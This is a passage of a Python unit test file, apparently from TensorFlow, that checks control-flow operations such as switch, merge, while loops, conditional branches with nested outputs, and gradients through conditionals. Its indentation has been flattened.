# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OiR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-long-lambda
"""Tests for tensorflow.ops.control_flow_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import math
import sys
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import function as eager_function
from tensorflow.python.eager import wrap_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import gen_control_flow_ops
from tensorflow.python.ops import gen_data_flow_ops
from tensorflow.python.ops import gen_logging_ops
from tensorflow.python.ops import gen_state_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_grad # pylint: disable=unused-import
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import tensor_array_grad # pylint: disable=unused-import
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops import while_v2 # pylint: disable=unused-import
# pylint: disable=unused-import
import tensorflow.python.ops.tensor_array_grad
# pylint: enable=unused-import
from tensorflow.python.platform import test
from tensorflow.python.training import adam
from tensorflow.python.training import gradient_descent
from tensorflow.python.util import nest
def check_consumers(graph):
"""Sanity check on the consumer list of the tensors."""
consumer_count = {}
for op in graph.get_operations():
for v in op.inputs:
cnt = consumer_count.get(v, 0)
consumer_count[v] = cnt + 1
for k, v in consumer_count.items():
if len(k.consumers()) != v:
return False
return True
def all_fetchables():
tensor_names = []
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.outputs:
if graph.is_fetchable(t):
tensor_names.append(t.name)
return tensor_names
def all_feedables():
feedable_tensors = []
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.inputs:
if graph.is_feedable(t):
feedable_tensors.append(t)
return feedable_tensors
def opt_cfg():
return config_pb2.ConfigProto(
allow_soft_placement=True,
graph_options=config_pb2.GraphOptions(
optimizer_options=config_pb2.OptimizerOptions(
opt_level=config_pb2.OptimizerOptions.L1,
do_function_inlining=True,
do_constant_folding=True)))
def isum(s, maximum_iterations=None):
i = constant_op.constant(0, name="i")
c = lambda i, s: math_ops.less(i, 10)
b = lambda i, s: [math_ops.add(i, 1), math_ops.add(i, s)]
_, r_s = control_flow_ops.while_loop(
c, b, [i, s], maximum_iterations=maximum_iterations)
return r_s
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
@test_util.run_v1_only("b/120545219")
def testRefIdentity(self):
with self.cached_session():
v = variables.VariableV1(7)
v = control_flow_ops._Identity(v)
op = state_ops.assign(v, 9)
v2 = control_flow_ops.with_dependencies([op], v)
self.assertTrue(isinstance(v2, ops.Tensor))
self.evaluate(variables.global_variables_initializer())
self.assertEqual(9, self.evaluate(v2))
@test_util.run_v1_only("b/120545219")
def testRefEnter(self):
with self.cached_session():
v = variables.VariableV1(7)
enter_v = control_flow_ops._Enter(v, "foo_1", is_constant=True)
nine = constant_op.constant(9)
enter_nine = gen_control_flow_ops.enter(nine, "foo_1")
op = state_ops.assign(enter_v, enter_nine)
v2 = control_flow_ops.with_dependencies([op], enter_v)
v3 = control_flow_ops.exit(v2)
self.evaluate(variables.global_variables_initializer())
self.assertEqual(9, self.evaluate(v3))
@test_util.run_v1_only("b/120545219")
def testRefSwitch(self):
with self.cached_session():
v = variables.VariableV1(7)
p = constant_op.constant(True)
v1 = control_flow_ops._SwitchRefOrTensor(v._ref(), p) # pylint: disable=protected-access
v2 = state_ops.assign(v1[1], 9)
self.evaluate(variables.global_variables_initializer())
self.assertEqual(9, self.evaluate(v2))
def testEnterMulExit(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
enter_data = gen_control_flow_ops.enter(data, "foo_1", False)
five = constant_op.constant(5)
enter_five = gen_control_flow_ops.enter(five, "foo_1", False)
mul_op = math_ops.multiply(enter_data, enter_five)
exit_op = control_flow_ops.exit(mul_op)
result = self.evaluate(exit_op)
self.assertAllEqual(np.array([x * 5 for x in [1, 2, 3, 4, 5, 6]]), result)
@test_util.run_deprecated_v1
def testEnterShapePropagation(self):
with self.cached_session():
v = variables.Variable([0.0, 0.0], dtype=dtypes.float32)
# If is_constant=True, the shape information should be propagated.
enter_v_constant = gen_control_flow_ops.enter(
v, "frame1", is_constant=True)
self.assertEqual(enter_v_constant.shape, [2])
# Otherwise, the shape should be unknown.
enter_v_non_constant = gen_control_flow_ops.enter(
v, "frame2", is_constant=False)
self.assertEqual(enter_v_non_constant.shape, None)
@test_util.run_v1_only("b/120545219")
def testSwitchMergeIndexedSlices(self):
with self.cached_session():
values = constant_op.constant([1, 2, 3, 4, 5, 6])
indices = constant_op.constant([0, 2, 4, 6, 8, 10])
data = ops.IndexedSlices(values, indices)
pred = ops.convert_to_tensor(True)
switch_op = control_flow_ops.switch(data, pred)
merge_op = control_flow_ops.merge(switch_op)[0]
val = merge_op.values
ind = merge_op.indices
self.assertAllEqual(np.arange(1, 7), val)
self.assertAllEqual(np.arange(0, 12, 2), ind)
@test_util.run_v1_only("b/120545219")
def testSwitchDeadBranch(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
ports = ops.convert_to_tensor(True, name="ports")
switch_op = control_flow_ops.switch(data, ports)
dead_branch = array_ops.identity(switch_op[0])
with self.assertRaisesWithPredicateMatch(
errors_impl.InvalidArgumentError,
lambda e: "Retval[0] does not have value" in str(e)):
self.evaluate(dead_branch)
@test_util.run_v1_only("b/120545219")
def testSwitchMergeLess(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
zero = ops.convert_to_tensor(0)
one = ops.convert_to_tensor(1)
less_op = math_ops.less(zero, one)
switch_op = control_flow_ops.switch(data, less_op)
merge_op = control_flow_ops.merge(switch_op)[0]
result = self.evaluate(merge_op)
self.assertAllEqual(np.arange(1, 7), result)
@test_util.run_v1_only("b/120545219")
def testSwitchMergeAddIdentity(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
ports = ops.convert_to_tensor(False, name="ports")
switch_op = control_flow_ops.switch(data, ports)
one = constant_op.constant(1)
add_op = math_ops.add(switch_op[0], one)
id_op = array_ops.identity(switch_op[1])
merge_op = control_flow_ops.merge([add_op, id_op])[0]
result = self.evaluate(merge_op)
self.assertAllEqual(np.array([x + 1 for x in [1, 2, 3, 4, 5, 6]]), result)
@test_util.run_v1_only("b/120545219")
def testSwitchMergeAddMul(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
ports = ops.convert_to_tensor(True, name="ports")
switch_op = control_flow_ops.switch(data, ports)
one = constant_op.constant(1)
add_op = math_ops.add(switch_op[0], one)
five = constant_op.constant(5)
mul_op = math_ops.multiply(switch_op[1], five)
merge_op = control_flow_ops.merge([add_op, mul_op])[0]
result = self.evaluate(merge_op)
self.assertAllEqual(np.array([x * 5 for x in [1, 2, 3, 4, 5, 6]]), result)
@test_util.run_v1_only("b/120545219")
def testLoop_false(self):
with self.cached_session():
false = ops.convert_to_tensor(False)
n = constant_op.constant(10)
enter_false = gen_control_flow_ops.enter(false, "foo_1", False)
enter_n = gen_control_flow_ops.enter(n, "foo_1", False)
merge_n = control_flow_ops.merge([enter_n, enter_n], name="merge_n")[0]
switch_n = control_flow_ops.switch(merge_n, enter_false)
exit_n = control_flow_ops.exit(switch_n[0])
next_n = control_flow_ops.next_iteration(switch_n[0])
merge_n.op._update_input(1, next_n)
result = self.evaluate(exit_n)
self.assertAllEqual(10, result)
@test_util.run_deprecated_v1
def testLoop_1(self):
with self.cached_session():
zero = constant_op.constant(0)
one = constant_op.constant(1)
n = constant_op.constant(10)
enter_i = gen_control_flow_ops.enter(zero, "foo", False)
enter_one = gen_control_flow_ops.enter(one, "foo", True)
enter_n = gen_control_flow_ops.enter(n, "foo", True)
with ops.device(test.gpu_device_name()):
merge_i = control_flow_ops.merge([enter_i, enter_i])[0]
less_op = math_ops.less(merge_i, enter_n)
cond_op = control_flow_ops.loop_cond(less_op)
switch_i = control_flow_ops.switch(merge_i, cond_op)
add_i = math_ops.add(switch_i[1], enter_one)
next_i = control_flow_ops.next_iteration(add_i)
merge_i.op._update_input(1, next_i)
exit_i = control_flow_ops.exit(switch_i[0])
result = self.evaluate(exit_i)
self.assertAllEqual(10, result)
@test_util.run_v1_only("b/120545219")
def testLoop_2(self):
with self.cached_session():
zero = constant_op.constant(0)
one = constant_op.constant(1)
n = constant_op.constant(10)
enter_i = gen_control_flow_ops.enter(zero, "foo", False)
enter_one = gen_control_flow_ops.enter(one, "foo", True)
enter_n = gen_control_flow_ops.enter(n, "foo", True)
merge_i = control_flow_ops.merge([enter_i, enter_i])[0]
less_op = math_ops.less(merge_i, enter_n)
cond_op = control_flow_ops.loop_cond(less_op)
switch_i = control_flow_ops.switch(merge_i, cond_op)
add_i = math_ops.add(switch_i[1], enter_one)
with ops.device(test.gpu_device_name()):
next_i = control_flow_ops.next_iteration(add_i)
merge_i.op._update_input(1, next_i)
exit_i = control_flow_ops.exit(switch_i[0])
result = self.evaluate(exit_i)
self.assertAllEqual(10, result)
@test_util.run_v1_only("b/120545219")
def testDifferentFrame(self):
with self.cached_session():
data = array_ops.placeholder(dtypes.float32, shape=[])
enter_1 = gen_control_flow_ops.enter(data, "foo_1", False)
enter_2 = gen_control_flow_ops.enter(data, "foo_2", False)
res = math_ops.add(enter_1, enter_2)
with self.assertRaisesOpError("has inputs from different frames"):
res.eval(feed_dict={data: 1.0})
@test_util.run_deprecated_v1
def testCondBool(self):
values = constant_op.constant(10)
fn1 = lambda: math_ops.add(values, 1)
fn2 = lambda: math_ops.subtract(values, 1)
with self.assertRaisesRegexp(TypeError, "must not be a Python bool"):
_ = control_flow_ops.cond(False, fn1, fn2)
@test_util.run_deprecated_v1
def testCondInt(self):
p = array_ops.placeholder(dtypes.bool, shape=[])
v = constant_op.constant(10)
fn1 = lambda: math_ops.add(v, 1)
fn2 = lambda: math_ops.subtract(v, 1)
y = control_flow_ops.cond(p, fn1, fn2)
grad = gradients_impl.gradients(y, [v])
self.assertAllEqual([None], grad)
def testCondOutputShape(self):
x = constant_op.constant(1.0)
b = control_flow_ops.cond(
constant_op.constant(True), lambda: math_ops.square(x),
lambda: math_ops.subtract(x, 1.))
self.assertEqual(b.shape, tensor_shape.scalar())
@test_util.run_v1_only("b/120545219")
def testFetchable(self):
with self.cached_session() as sess:
x = array_ops.placeholder(dtypes.float32)
control_flow_ops.cond(
constant_op.constant(True), lambda: x + 2, lambda: x + 0)
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.inputs:
if graph.is_fetchable(t.op):
sess.run(t, feed_dict={x: 3})
else:
with self.assertRaisesRegexp(ValueError,
"has been marked as not fetchable"):
sess.run(t, feed_dict={x: 3})
@test_util.disable_control_flow_v2("Not relevant")
@test_util.run_v1_only("b/120545219")
def testFeedable(self):
with self.cached_session() as sess:
c = constant_op.constant(2)
i0 = constant_op.constant(0)
r = control_flow_ops.while_loop(lambda i: i < 1000,
lambda i: math_ops.square(c) + i, [i0])
self.assertEqual(1000, r.eval(feed_dict={i0: 0}))
feedable_tensors = all_feedables()
for t in feedable_tensors:
sess.run(r, feed_dict={t: 3})
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.inputs:
if t not in feedable_tensors and t.dtype is dtypes.int32:
with self.assertRaisesRegexp(ValueError, "may not be fed"):
sess.run(r, feed_dict={t: 3})
@test_util.run_v1_only("b/120545219")
def testCondIndexedSlices(self):
with self.cached_session():
values = constant_op.constant(10)
indices = constant_op.constant(0)
x = ops.IndexedSlices(values, indices)
pred = math_ops.less(1, 2)
fn1 = lambda: ops.IndexedSlices(math_ops.add(x.values, 1), indices)
fn2 = lambda: ops.IndexedSlices(math_ops.subtract(x.values, 1), indices)
r = control_flow_ops.cond(pred, fn1, fn2)
val = r.values
ind = r.indices
self.assertAllEqual(11, val)
self.assertAllEqual(0, ind)
@test_util.run_v1_only("b/120545219")
def testCondSparseTensor(self):
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
indices = constant_op.constant(
[[0], [3]], dtype=dtypes.int64, name="indices")
shape = constant_op.constant([10], dtype=dtypes.int64, name="dense_shape")
x = sparse_tensor.SparseTensor(indices, values, dense_shape=shape)
pred = math_ops.less(1, 2)
fn1 = lambda: sparse_tensor.SparseTensor(
indices + 1, x.values + 1, dense_shape=shape)
fn2 = lambda: sparse_tensor.SparseTensor(
indices, x.values - 1, dense_shape=shape)
r = control_flow_ops.cond(pred, fn1, fn2)
self.assertAllEqual([3.0, 5.0], r.values)
self.assertAllEqual([[1], [4]], r.indices)
self.assertAllEqual(r.values.get_shape(), (2,))
@test_util.run_v1_only("b/120545219")
def testCondResource(self):
with self.cached_session():
rv = resource_variable_ops.ResourceVariable(True)
self.evaluate(variables.global_variables_initializer())
t = ops.convert_to_tensor(1.0)
def case():
assign = resource_variable_ops.assign_variable_op(rv.handle, False)
with ops.control_dependencies([assign]):
return array_ops.identity(t)
self.assertEqual(
1.0, self.evaluate(control_flow_ops.cond(rv, case, lambda: t)))
@test_util.run_v1_only("b/120545219")
def testCondWithTensorArrayGrad(self):
with self.cached_session() as sess:
with ops.device(test.gpu_device_name()):
pred = array_ops.placeholder(dtypes.bool, [])
x = constant_op.constant([1.0, 2.0, 3.0])
y = control_flow_ops.cond(
pred, lambda: functional_ops.map_fn(lambda z: z * 2.0, x),
lambda: constant_op.constant([1.0, 1.0, 1.0]))
g = gradients_impl.gradients(y, x)[0]
self.assertAllEqual(sess.run(g, {pred: True}), [2.0, 2.0, 2.0])
self.assertAllEqual(sess.run(g, {pred: False}), [0.0, 0.0, 0.0])
@test_util.disable_control_flow_v2("b/113293074")
@test_util.run_v1_only("b/120545219")
def testCondIndexedSlicesDifferentTypes(self):
with self.cached_session():
values = constant_op.constant(10)
i_32 = ops.convert_to_tensor(0, name="one", dtype=dtypes.int32)
i_64 = ops.convert_to_tensor(0, name="one", dtype=dtypes.int64)
x = ops.IndexedSlices(values, i_32)
pred = math_ops.less(1, 2)
fn1 = lambda: ops.IndexedSlices(math_ops.add(x.values, 1), i_32)
fn2 = lambda: ops.IndexedSlices(math_ops.subtract(x.values, 1), i_64)
r = control_flow_ops.cond(pred, fn1, fn2)
val = r.values
ind = r.indices
self.assertAllEqual(11, val)
self.assertAllEqual(0, ind)
self.assertTrue(ind.dtype == np.int64)
@test_util.run_v1_only("b/120545219")
def testCondColocation(self):
with self.session(use_gpu=True):
with ops.device("/cpu:0"):
v = variables.Variable(7.0)
x = constant_op.constant(10.0)
pred = math_ops.less(1.0, 2.0)
fn1 = lambda: math_ops.add(v, 1.0)
fn2 = lambda: math_ops.subtract(x, 1.0)
r = control_flow_ops.cond(pred, fn1, fn2)
for op in x.graph.get_operations():
if op.name == "cond/Add/Switch":
self.assertDeviceEqual(op.device, "/cpu:0")
def _testCond_1(self, use_gpu):
with self.cached_session(use_gpu=use_gpu):
x = constant_op.constant(10)
pred = math_ops.less(1, 2)
fn1 = lambda: math_ops.add(x, 1)
fn2 = lambda: math_ops.subtract(x, 1)
r = control_flow_ops.cond(pred, fn1, fn2)
result = self.evaluate(r)
self.assertAllEqual(11, result)
def testCond_1(self):
self._testCond_1(use_gpu=False)
# TODO(b/116526896): Enable GPU tests.
# self._testCond_1(use_gpu=True)
def testCond_2(self):
with self.cached_session():
x = constant_op.constant(10)
r = control_flow_ops.cond(
math_ops.less(1, 0), lambda: math_ops.add(x, 1),
lambda: math_ops.subtract(x, 1))
result = self.evaluate(r)
self.assertAllEqual(9, result)
def testCond_3(self):
with self.cached_session():
x = constant_op.constant(10)
pred = math_ops.less(1, 2)
fn1 = lambda: math_ops.add(x, 1)
fn2 = lambda: math_ops.subtract(x, 1)
fn3 = lambda: math_ops.add(control_flow_ops.cond(pred, fn1, fn2), 1)
r = control_flow_ops.cond(pred, fn3, fn2)
result = self.evaluate(r)
self.assertAllEqual(12, result)
@test_util.run_in_graph_and_eager_modes
def testCondPruning(self):
v1 = variables.Variable(7)
v2 = variables.Variable(7)
v3 = variables.Variable(7)
def f():
age = constant_op.constant(3)
max_age = constant_op.constant(2)
pred = math_ops.greater(age, max_age)
fn1 = lambda: [state_ops.assign(v1, 1).op, state_ops.assign(v2, 2).op]
fn2 = lambda: [state_ops.assign(v3, 3).op, constant_op.constant(10).op]
r = control_flow_ops.cond(pred, fn1, fn2)
self.assertEqual(len(r), 2)
return r[1]
f_defun = eager_function.defun(f)
if not context.executing_eagerly():
with self.cached_session():
self.evaluate(variables.global_variables_initializer())
result = self.evaluate(f())
self.assertEqual(True, result)
# Only second cond result was fetched, so v1 assign shouldn't run.
self.assertEqual(7, self.evaluate(v1))
self.assertEqual(2, self.evaluate(v2))
self.assertEqual(7, self.evaluate(v3))
result = f_defun()
self.assertEqual(True, self.evaluate(result))
# Both v1 and v2 branch assignments should be run in defun.
self.assertEqual(1, self.evaluate(v1))
self.assertEqual(2, self.evaluate(v2))
self.assertEqual(7, self.evaluate(v3))
def testCond_5(self):
with self.cached_session():
alive = constant_op.constant(True, name="alive")
count = constant_op.constant(0, name="count")
def body(i):
return control_flow_ops.cond(
alive, lambda: [math_ops.less(i, 3), math_ops.add(count, 1)],
lambda: [alive, count])
for i in range(10):
alive, count = body(i)
self.assertAllEqual(4, self.evaluate(count))
@test_util.run_v1_only("b/120545219")
def testCond_6(self):
with self.cached_session():
v1 = variables.Variable([7])
age = constant_op.constant(3)
pred = math_ops.greater(age, 4)
fn1 = lambda: age
fn2 = lambda: v1
r = control_flow_ops.cond(pred, fn1, fn2)
self.evaluate(variables.global_variables_initializer())
result = self.evaluate(r)
self.assertAllEqual(np.array([7]), result)
def testCond_7(self):
with self.cached_session() as sess:
x = constant_op.constant(10)
y = constant_op.constant(200)
pred = math_ops.less(1, 2)
fn1 = lambda: [math_ops.add(x, 1), math_ops.add(x, 2)]
fn2 = lambda: [y, y]
r = control_flow_ops.cond(pred, fn1, fn2)
self.assertAllEqual([11, 12], self.evaluate(r))
def testCondListOutput(self):
with self.cached_session() as sess:
x = constant_op.constant(10)
y = constant_op.constant(200)
pred = math_ops.less(1, 2)
fn1 = lambda: [math_ops.add(x, y), math_ops.add(x, y)]
fn2 = lambda: [y, y]
r = control_flow_ops.cond(pred, fn1, fn2)
test_result = self.evaluate(r)
self.assertListEqual([210, 210], test_result)
def testTupleOutput(self):
with self.cached_session() as sess:
x = constant_op.constant(10)
y = constant_op.constant(200)
pred = math_ops.less(1, 2)
fn1 = lambda: (math_ops.add(x, y), math_ops.add(x, y))
fn2 = lambda: (y, y)
r = control_flow_ops.cond(pred, fn1, fn2)
test_result = self.evaluate(r)
self.assertTupleEqual((210, 210), test_result)
def testDictOutput(self):
with self.cached_session() as sess:
x = constant_op.constant(10)
y = constant_op.constant(200)
pred = math_ops.less(1, 2)
fn1 = lambda: {"a": math_ops.add(x, y), "b": math_ops.add(x, y)}
fn2 = lambda: {"a": y, "b": y}
r = control_flow_ops.cond(pred, fn1, fn2)
test_result = self.evaluate(r)
self.assertDictEqual({"a": 210, "b": 210}, test_result)
@test_util.run_deprecated_v1
def testEmbeddedListOutput(self):
with self.cached_session() as sess:
x = constant_op.constant(10)
y = constant_op.constant(200)
pred = math_ops.less(1, 2)
fn1 = lambda: [[math_ops.add(x, y), math_ops.add(x, y)]]
fn2 = lambda: [[y, y]]
# Pass strict=True flag as cond_v2 allows for tensors to be
# in nested output structures as singletons
r = control_flow_ops.cond(pred, fn1, fn2, strict=True)
test_result = self.evaluate(r)
self.assertListEqual([[210, 210]], test_result)
def testEmbeddedTupleOutput(self):
with self.cached_session() as sess:
x = constant_op.constant(10)
y = constant_op.constant(200)
pred = math_ops.less(1, 2)
fn1 = lambda: ((math_ops.add(x, y), math_ops.add(x, y)))
fn2 = lambda: ((y, y))
r = control_flow_ops.cond(pred, fn1, fn2)
test_result = self.evaluate(r)
self.assertTupleEqual(((210, 210)), test_result)
def testEmbeddedDictOutput(self):
with self.cached_session() as sess:
x = constant_op.constant(10)
y = constant_op.constant(200)
pred = math_ops.less(1, 2)
fn1 = lambda: {"a": {"c": math_ops.add(x, y)},
"b": {"d": math_ops.add(x, y)}}
fn2 = lambda: {"a": {"c": y},
"b": {"d": y}}
r = control_flow_ops.cond(pred, fn1, fn2)
test_result = self.evaluate(r)
self.assertDictEqual({"a": {"c": 210}, "b": {"d": 210}}, test_result)
@test_util.run_v1_only("b/120545219")
def testCheckNestedOutputStruct(self):
with self.cached_session() as sess:
x = constant_op.constant(10)
y = constant_op.constant(200)
pred = math_ops.less(1, 2)
fn1 = lambda: {"a": math_ops.add(x, y), "b": math_ops.add(x, y)}
fn2 = lambda: {"c": y, "d": y}
v1_msg = "The two structures don't have the same nested structure"
v2_msg = "Outputs of true_fn and false_fn must have the same structure"
with self.assertRaisesRegexp(
ValueError,
v2_msg if control_flow_util.ENABLE_CONTROL_FLOW_V2 else v1_msg):
r = control_flow_ops.cond(pred, fn1, fn2)
self.evaluate(r)
@test_util.run_deprecated_v1
def testCondRef(self):
with self.cached_session():
x = gen_state_ops.variable(
shape=[1],
dtype=dtypes.float32,
name="x",
container="",
shared_name="")
true_fn = lambda: x
false_fn = lambda: constant_op.constant([2.0])
r = control_flow_ops.cond(constant_op.constant(False), true_fn, false_fn)
self.assertAllEqual([2.0], self.evaluate(r))
@test_util.disable_control_flow_v2("b/79881896 (control deps)")
@test_util.run_v1_only("b/120545219")
def testCondWithControl(self):
with self.cached_session():
control_holder = array_ops.placeholder(dtypes.float32, shape=())
a = constant_op.constant(3)
def true_branch():
with ops.control_dependencies([control_holder]):
_ = a + 1
return a + 2
r = control_flow_ops.cond(
constant_op.constant(True), true_branch,
lambda: constant_op.constant(1))
self.assertEqual(5, self.evaluate(r))
@test_util.run_v1_only("b/120545219")
def testUninitializedRefIdentity(self):
with self.cached_session() as sess:
v = gen_state_ops.variable(
shape=[1],
dtype=dtypes.float32,
name="v",
container="",
shared_name="")
inited = state_ops.is_variable_initialized(v)
v_f, v_t = control_flow_ops.ref_switch(v, inited)
# Both v_f and v_t are uninitialized references. However, an actual use
# of the reference in the 'true' branch in the 'tf.identity' op will
# not 'fire' when v is uninitialized, so this is a valid construction.
# This test tests that ref_identity allows uninitialized ref as input
# so that this construction is allowed.
v_f_op = gen_array_ops.ref_identity(v_f)
v_t_op = gen_array_ops.ref_identity(v_t)
with ops.control_dependencies([v_f_op]):
assign_v = state_ops.assign(v, [1.0])
with ops.control_dependencies([v_t_op]):
orig_v = array_ops.identity(v)
merged_op = control_flow_ops.merge([assign_v, orig_v])
self.assertAllEqual([1.0], self.evaluate(merged_op.output))
def testCondSwitchIdentity(self):
# Make sure the recv identity is not removed by optimization.
with session.Session(config=opt_cfg()) as sess:
pred = constant_op.constant(True)
def fn1():
return control_flow_ops.no_op()
def fn2():
return control_flow_ops.Assert(False, ["Wrong branch!!!"])
r = control_flow_ops.cond(pred, fn1, fn2)
self.evaluate(r)
def testCondRecvIdentity(self):
# Make sure the switch identity is not removed by optimization.
with session.Session(config=opt_cfg()) as sess:
with ops.device(test.gpu_device_name()):
pred = constant_op.constant(True)
def fn1():
return control_flow_ops.no_op()
def fn2():
with ops.device("/cpu:0"):
return control_flow_ops.Assert(False, ["Wrong branch!!!"])
r = control_flow_ops.cond(pred, fn1, fn2)
self.evaluate(r)
@test_util.run_v1_only("b/120545219")
def testCondGrad_1(self):
with self.cached_session():
x = constant_op.constant(10.0, name="x")
pred = math_ops.less(1, 2)
fn1 = lambda: array_ops.identity(x)
fn2 = lambda: array_ops.identity(x)
r = control_flow_ops.cond(pred, fn1, fn2)
grad = gradients_impl.gradients(r, [x])[0]
self.assertAllEqual(1.0, self.evaluate(grad))
@test_util.run_deprecated_v1
def testCondGrad_2(self):
with self.cached_session():
c = array_ops.placeholder(dtypes.int32, shape=[])
x = constant_op.constant(10.0)
pred = math_ops.less(c, 2)
fn1 = lambda: math_ops.multiply(x, 42.0)
fn2 = lambda: math_ops.multiply(x, 3.0)
r = control_flow_ops.cond(pred, fn1, fn2)
grad = gradients_impl.gradients(r, [x])[0]
self.assertAllEqual(42.0, grad.eval(feed_dict={c: 1}))
self.assertAllEqual(3.0, grad.eval(feed_dict={c: 3}))
@test_util.disable_control_flow_v2(
"b/110550782 (gradient w.r.t external variable)")
@test_util.run_deprecated_v1
def testCondGrad_3(self):
with self.cached_session():
c = array_ops.placeholder(dtypes.int32, shape=[])
ox = constant_op.constant(10.0)
pred = math_ops.less(c, 2)
def fn1(x):
m = x * x
return gradients_impl.gradients(m, [ox])[0]
fn2 = lambda: math_ops.multiply(ox, 3.0)
y = math_ops.multiply(7.0, ox)
r = control_flow_ops.cond(pred, lambda: fn1(y), fn2)
self.assertAllEqual(980.0, r.eval(feed_dict={c: 1}))
self.assertAllEqual(30.0, r.eval(feed_dict={c: 3}))
@test_util.run_deprecated_v1
def testCondGradMultiDevice(self):
config = config_pb2.ConfigProto(device_count={"CPU": 2},
allow_soft_placement=True)
with self.cached_session(use_gpu=True, config=config) as sess:
pred = array_ops.placeholder(dtypes.bool, [])
x = array_ops.placeholder(dtypes.float32)
y = array_ops.placeholder(dtypes.float32)
with ops.device("/cpu:0"):
z = control_flow_ops.cond(pred, lambda: x * y * 2.0, lambda: 2.0)
with ops.device("/cpu:1"):
grad = gradients_impl.gradients(z, x)[0]
with ops.device("/cpu:0"):
grad_grad = gradients_impl.gradients(grad, x)[0]
self.assertEqual(sess.run(grad, {pred: True, x: 1.0, y: 2.0}), 4.0)
self.assertEqual(sess.run(grad, {pred: False, x: 1.0, y: 2.0}), 0.0)
# v1 control flow gets None second derivative for some reason.
if not control_flow_util.ENABLE_CONTROL_FLOW_V2:
self.assertIsNone(grad_grad)
return
self.assertEqual(sess.run(grad_grad, {pred: True, x: 1.0, y: 2.0}), 0.0)
self.assertEqual(sess.run(grad_grad, {pred: False, x: 1.0, y: 2.0}), 0.0)
@test_util.run_v1_only("b/120545219")
def testNestedCond_Simple(self):
with self.cached_session():
x = constant_op.constant(0., name="X")
y = control_flow_ops.cond(
constant_op.constant(True), lambda: x,
lambda: control_flow_ops.cond(x < 1., lambda: x, lambda: x))
result = gradients_impl.gradients(y, x)[0]
self.assertEqual(1.0, self.evaluate(result))
z = control_flow_ops.cond(
constant_op.constant(False), lambda: x,
lambda: control_flow_ops.cond(x < 1., lambda: x, lambda: x))
result = gradients_impl.gradients(z, x)[0]
self.assertEqual(1.0, self.evaluate(result))
@test_util.disable_control_flow_v2("b/113327884")
@test_util.run_v1_only("b/120545219")
def testCondGrad_Gather(self):
with self.cached_session() as sess:
v1 = variables.Variable([1.0, 42.0])
c = array_ops.placeholder(dtypes.int32, shape=[])
pred = math_ops.less(c, 2)
fn1 = lambda: array_ops.identity(v1)
fn2 = lambda: array_ops.gather(v1, [1, 1])
r = control_flow_ops.cond(pred, fn1, fn2)
grad = gradients_impl.gradients(r, [v1])[0]
self.evaluate(variables.global_variables_initializer())
# Should just be [1, 1], but possibly a sparse representation
gv, gi = sess.run([grad.values, grad.indices], feed_dict={c: 1})
dense_gv = [
sum(y for (x, y) in zip(gi, gv) if x == i) for i in range(2)
]
self.assertAllEqual(dense_gv, [1.0, 1.0])
# Should be [0, 2], as the else forwards v1[1] twice
gv, gi = sess.run([grad.values, grad.indices], feed_dict={c: 3})
dense_gv = [
sum(y for (x, y) in zip(gi, gv) if x == i) for i in range(2)
]
self.assertAllEqual(dense_gv, [0.0, 2.0])
@test_util.run_v1_only("b/120545219")
def testCondPredicateTensor(self):
"""Regression test for lowering predicate from non-first output of an op."""
@eager_function.defun
def foo():
return constant_op.constant("foo"), constant_op.constant(True)
r = control_flow_ops.cond(foo()[1], lambda: 1.0, lambda: 2.0)
self.assertEqual(self.evaluate(r), 1.0)
@test_util.run_in_graph_and_eager_modes
def testCondAutoControlDeps(self):
def branch_fn():
logging_ops.print_v2("A")
logging_ops.print_v2("B")
with ops.control_dependencies([logging_ops.print_v2("C")]):
return constant_op.constant(10)
def build_cond():
return control_flow_ops.cond(
constant_op.constant(True), branch_fn, lambda: 0)
def build_nested_cond():
return control_flow_ops.cond(
constant_op.constant(True), build_cond, lambda: 0)
# In v1 graph mode, pruning should make only "C" print.
if not context.executing_eagerly():
with self.cached_session():
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(build_cond()), 10)
self.assertEqual(printed.contents(), "C\n")
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(build_nested_cond()), 10)
self.assertEqual(printed.contents(), "C\n")
# In defuns, all prints should execute in program order.
